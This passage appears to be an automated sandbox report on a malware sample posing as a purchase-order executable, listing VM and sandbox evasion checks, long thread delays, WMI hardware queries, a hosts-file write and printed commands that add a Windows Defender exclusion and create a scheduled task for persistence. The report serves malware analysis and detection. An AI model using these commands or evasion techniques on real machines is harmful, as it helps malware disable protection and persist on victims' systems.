                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match | File source: 00000014.00000002.355635331.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Purchase order 450080088 proj. Allt Charnan.exe PID: 6588, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jVULYR.exe PID: 7076, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jVULYR.exe PID: 7100, type: MEMORYSTR
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000014.00000002.355635331.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000000.00000002.286211001.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000014.00000002.355635331.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe TID: 6592 | Thread sleep time: -45733s >= -30000s
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe TID: 6608 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7104 | Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe TID: 2376 | Thread sleep time: -12912720851596678s >= -30000s
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe TID: 3436 | Thread sleep count: 4140 > 30
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe TID: 3436 | Thread sleep count: 4455 > 30
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 7088 | Thread sleep time: -45733s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 2400 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 7016 | Thread sleep time: -45733s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 7036 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872 | Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 2920 | Thread sleep count: 3147 > 30
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872 | Thread sleep time: -59500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 2920 | Thread sleep count: 4125 > 30
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872 | Thread sleep time: -52688s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872 | Thread sleep time: -48376s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872 | Thread sleep time: -44594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 872 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 5660 | Thread sleep time: -11990383647911201s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 5664 | Thread sleep count: 4186 > 30
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe TID: 7104 | Thread sleep count: 2293 > 30
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6818
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1776
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Window / User API: threadDelayed 4140
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Window / User API: threadDelayed 4455
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Window / User API: threadDelayed 3147
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Window / User API: threadDelayed 4125
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Window / User API: threadDelayed 4186
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Window / User API: threadDelayed 2293
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Thread delayed: delay time: 45733
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Thread delayed: delay time: 45733
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Thread delayed: delay time: 45733
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Thread delayed: delay time: 30000
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Thread delayed: delay time: 922337203685477
                    Source: jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
                    Source: jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
                    Source: jVULYR.exe, 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Code function: 25_2_0634CEB0 LdrInitializeThunk, 25_2_0634CEB0
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Purchase order 450080088 proj. Allt Charnan.exe, Ej/rT.cs | Reference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: NpPgfycY.exe.0.dr, Ej/rT.cs | Reference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.cs | Reference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 0.0.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.cs | Reference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.2.unpack, Ej/rT.cs | Reference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.1.unpack, Ej/rT.cs | Reference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.3.unpack, Ej/rT.cs | Reference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.0.unpack, Ej/rT.cs | Reference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 8.2.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.0.unpack, Ej/rT.cs | Reference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: jVULYR.exe.9.dr, Ej/rT.cs | Reference to suspicious API methods: ('WJJ', 'LoadLibrary@kernel32'), ('QJy', 'GetProcAddress@kernel32')
                    Source: 9.0.Purchase order 450080088 proj. Allt Charnan.exe.400000.4.unpack, A/E1.cs | Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.2.Purchase order 450080088 proj. Allt Charnan.exe.400000.0.unpack, A/E1.cs | Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | File written: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmp
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Process created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Process created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmpFBF4.tmp
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Process created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp2B32.tmp
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Process created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
